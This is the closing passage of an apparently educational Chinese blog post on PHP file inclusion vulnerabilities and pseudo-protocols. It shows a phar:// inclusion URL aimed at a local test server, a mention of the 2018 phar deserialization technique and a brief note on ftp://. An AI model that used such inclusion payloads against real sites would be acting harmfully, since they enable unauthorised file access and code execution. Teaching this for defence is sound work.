<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;include.php?file&#x3D;phar:&#x2F;&#x2F;E:&#x2F;phpStudy&#x2F;PHPTutorial&#x2F;WWW&#x2F;phpinfo.zip&#x2F;phpinfo.txt</span><br></pre></td></tr></table></figure>



<p>另外，在 Black Hat 2018 大会上，研究人员公布了一款针对PHP应用程序的全新攻击技术：<code>phar://</code>协议对象注入技术。具体原理可以参考我另外一篇总结中所写：</p>
<blockquote>
<p>参考文章：<a target="_blank" rel="noopener" href="https://jiulin.space/2020/12/26/php1/#more">php反序列化漏洞总结</a></p>
</blockquote>
<h2 id="ftp"><a href="#ftp" class="headerlink" title="ftp://"></a>ftp://</h2><p>一种提供网络之间共享文件的协议，可以在计算机之间可靠、高效地传送文件。FTP协议包括两个组成部分，其一为FTP服务器，其二为FTP客户端。其中FTP服务器用来存储文件，用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候，通常利用FTP协议把网页或程序传到Web服务器上。</p>
<p>我们见到的大量CMS系统，也都是通过ftp来进行文件传输的。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/12/26/php1/" rel="prev" title="PHP反序列化漏洞总结">
      <i class="fa fa-chevron-left"></i> PHP反序列化漏洞总结
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/01/02/php2/" rel="next" title="文件上传漏洞总结">
      文件上传漏洞总结 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.</span> <span class="nav-text">文件包含漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%A6%82%E8%BF%B0"><span class="nav-number">2.1.</span> <span class="nav-text">文件包含概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0"><span class="nav-number">2.2.</span> <span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.3.</span> <span class="nav-text">本地文件包含漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#00%E6%88%AA%E6%96%AD"><span class="nav-number">2.3.1.</span> <span class="nav-text">%00截断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B7%AF%E5%BE%84%E9%95%BF%E5%BA%A6%E6%88%AA%E6%96%AD"><span class="nav-number">2.3.2.</span> <span class="nav-text">路径长度截断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%82%B9%E5%8F%B7%E6%88%AA%E6%96%AD"><span class="nav-number">2.3.3.</span> <span class="nav-text">点号截断</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#session%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.4.</span> <span class="nav-text">session文件包含漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.5.</span> <span class="nav-text">远程文件包含漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%97%AE%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="nav-number">2.5.1.</span> <span class="nav-text">问号绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BA%95%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="nav-number">2.5.2.</span> <span class="nav-text">井号绕过</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="nav-number">3.</span> <span class="nav-text">伪协议</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#file"><span class="nav-number">3.1.</span> <span class="nav-text">file:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#php"><span class="nav-number">3.2.</span> <span class="nav-text">php:&#x2F;&#x2F;</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#php-input"><span class="nav-number">3.2.1.</span> <span class="nav-text">php:&#x2F;&#x2F;input</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php-filter"><span class="nav-number">3.2.2.</span> <span class="nav-text">php:&#x2F;&#x2F;filter</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#zlib-amp-zip-amp-bzip2"><span class="nav-number">3.3.</span> <span class="nav-text">zlib:&#x2F;&#x2F; &amp; zip:&#x2F;&#x2F; &amp; bzip2:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#data"><span class="nav-number">3.4.</span> <span class="nav-text">data:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#phar"><span class="nav-number">3.5.</span> <span class="nav-text">phar:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ftp"><span class="nav-number">3.6.</span> <span class="nav-text">ftp:&#x2F;&#x2F;</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="jiulin"
      src="/images/header.jpg">
  <p class="site-author-name" itemprop="name">jiulin</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">jiulin</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
